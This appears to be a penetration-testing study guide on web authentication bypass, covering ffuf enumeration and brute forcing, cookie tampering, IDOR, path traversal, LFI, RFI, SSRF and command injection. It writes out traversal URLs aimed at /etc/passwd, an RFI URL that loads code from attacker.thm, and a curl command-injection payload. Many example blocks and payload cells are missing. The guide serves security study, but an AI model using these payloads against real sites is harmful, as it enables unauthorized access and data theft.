Web Authentication Bypass
Background
Web authentication bypass refers to the various techniques and methods used by attackers to gain unauthorized access to a website by bypassing its authentication mechanisms.
Techniques
There are many techniques that can be used to bypass authentication in web applications including Username Enumeration, Brute Forcing, Logic Flaws, Cookie Tampering, IDOR, Path Traversal, Local File Inclusion (LFI), Remote File Inclusion (RFI), Server-Side Request Forgery (SSRF), Command Injection.
In addition to the techniques described here, other techniques include Session Hijacking, Session Fixation, XSS, SQL Injection, Password Reuse and Social Engineering.
Username Enumeration
Username enumeration can be used with the help of the Fuzz Faster U Fool (ffuf) fuzzing tool.
In the following example, ffuf is used to determine if names from a password list are valid usernames, using these arguments:
-w: location of wordlist-X: request method-d: data to send-H: adds additional headers-u: URL to send request to-mr: text on page used to validate a valid username
Brute Forcing
Once valid usernames are found, a brute force attack can be performed on the victim's login page using ffuf.
In the following example, ffuf is used to test a list of valid unsernames against a list of potential passwords, using these arguments:
-w1: wordlist of valid usernames-w2: wordlist of potential passwords-w: specifies 2 wordlists that are comma separated-fc: checks for HTTP status code other than 200
Logic Flaws
A logic flaw is when the typical logical path of an application is either bypassed, circumvented, or manipulated by an attacker.
Here is an example of a flaw in a password reset form that enables an attacker to send an account reset for a valid account to an email address of the attacker's choosing. This example uses CURL request using the -H flag to add application/x-www-form-urlencoded so the web server knows data is being submitted, the -d flag specifies that the password reset for robert should be emailed to attacker@email.com:
Cookie Tampering
Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user's account, or elevated privileges. Cookie values are often hashed or encoded with ASCII or base32. A tool such as Crackstation or CyberChef could be used to help crack cookie hashes.
In the following example curl is used to tamper the cookie to show the user logged in as an admin:
IDOR
IDOR stands for Insecure Direct Object Reference occurs when user data input to a webserver is not validated. This occurs when web servers place too much trust in objects like files, data, and documents.
A simple IDOR example would be a site user whose profile is at the url
http://victim.com/profile?=1accesses the linkhttp://victim.com/profile?=100and sees another user's informationURLs are often encoded in base64, so IDOR vulnerabilities in based64 URLs can be identified/exploited
URLs might also be encoded with hashed IDs, often in MD5
Tips for exploiting IDOR include:
Testing parameter manipulation: This involves modifying parameters in the URL or payload to access restricted resources.
Testing for predictable resource locations: This involves attempting to guess the location of a resource by appending sequential numbers or other predictable values to the URL.
Testing for broken access controls: This involves attempting to access resources by bypassing authentication mechanisms.
Testing for verb tampering: This involves changing the HTTP verb (e.g., GET to POST) to access resources that are normally restricted.
Automated vulnerability scanning: Automated vulnerability scanners can be used to identify IDOR vulnerabilities. However, it's important to note that these tools may not always catch every vulnerability and should be used in conjunction with manual testing.
Reviewing code: It's important to review the code of the web application to understand how objects are referenced and accessed, which can help identify IDOR vulnerabilities.
Keeping up-to-date with common attack vectors: Staying informed about common attack vectors and researching new techniques can help you discover new and emerging IDOR vulnerabilities.
Tools for exploiting IDOR include:
OWASP Zed Attack Proxy ZAP: A web application security scanner.
Burp Suite: A web application security testing platform.
OWASP WebScarab: A framework for analyzing web applications.
sqlmap: An automated SQL injection and database takeover tool.
w3af: A web application attack and audit framework.
Arachni: A web application security scanner.
Vega: A web vulnerability scanner and testing platform.
Base64 Decoding Tool: For decoding base64 encoded URLs.
Base64 Encoding Tool: For encoding information to base64 URLs.
Hash Cracking Tool: To help crack parameters that are hashed, such as user IDs.
Path Traversal
Path Traversal, aka Directory Traversal, is a vulnerability that allows an attacker to read OS resources running an application. This vulnerability is exploited by manipulating a web app's URL. Path traversal vulnerabilities occur when the user's input is passed to a function such as file_get_contents in PHP.
In the following path traversal example,
get.php?file=is used to traverse to the OS password file:http://webapp.thm/get.php?file=../../../../etc/passwdA similar path traversal could be exploited against Windows by running
http://webapp.thm/get.php?file=../../../../boot.iniorhttp://webapp.thm/get.php?file=../../../../windows/win.iniHere is a list of common OS files that can be tested for path traversal:
| Location | Description |
|---|---|
| contains a message or system identification to be printed before the login prompt. |
| controls system-wide default variables, such as Export variables |
| specifies the version of the Linux kernel |
| has all registered user that has access to a system |
| contains information about the system's users' passwords |
| contains the history commands for |
| contains global system messages, including the messages that are logged during system startup |
| all emails for |
| Private SSH keys for a root or any known valid user on the server |
| the accessed requests for |
| contains the boot options for computers with BIOS firmware |
Local File Inclusion (LFI)
LFT attacks against web applications follows similar concepts as path traversal. PHP functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.
In the following example, the include PHP function can be used to obtain sensitive information by changing the lang input to /etc/passwd which would be equivalent to http://webapp.thm/index.php?lang=../../../../etc/passwd:
Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application. RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function. One requirement for RFI is that the allow_url_fopen option needs to be on.
For example, an attacker could host a php file where cmd.txt prints Hello Bros:
Next, the attacker injects their malicious URL into a form that has no input validation so that the page executes the remote file: http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt
Server-Side Request Forgery (SSRF)
SSRF is a vulnerability that causes the webserver to make an additional or edited HTTP request to the resource of the attacker's choosing
There are 2 types of SSRF: regular SSRF where data is returned or blind SSRF where no data is returned to the attacker.
If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.
The following SSRF example an API to retrieve stock status of an item is exploited to request the contents of the /admin file on the server itself:
Vulnerability:
Exploit:
Command Injection
Command injection is the abuse of an application's behavior to execute commands on the operating system, using the same privileges that the application on a device is running with. This vulnerability exists because applications often use functions in programming languages such as PHP, Python and NodeJS to pass data to and to make system calls on the machine’s operating system
Applications that use user input to populate system commands with data can often be combined in unintended behaviour. For example, the shell operators ;, & and && will combine two (or more) system commands and execute them both. Command injection attacks can be either verbose, where there is direct feedback, or bilnd, where there is no direct output.
The curl command is a great way to test for command injection. This is because you are able to use curl to deliver data to and from an application in your payload. Take this code snippet below as an example, a simple curl payload to an application is possible for command injection: curl http://vulnerable.app/process.php%3Fsearch%3DThe%20Beatles%3B%20whoami
Useful Linux Command Injection Payloads:
| Payload | Description |
|---|---|
| See what user the application is running under. |
| List the contents of the current directory. |
| This command will invoke the application to hang, useful in testing an application for blind command injection. |
| This is another useful payload in testing an application for blind command injection. |
| Netcat can be used to spawn a reverse shell onto the vulnerable application. |
Useful Windows Command Injection Payloads:
| See what user the application is running under. |
| List the contents of the current directory. |
| This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
| This command will also invoke the application to hang, can also test for blind injection. |
Resources
w3af: An open source web application attack and audit framework that can be used to identify vulnerabilities in web applications.
Resources
Last updated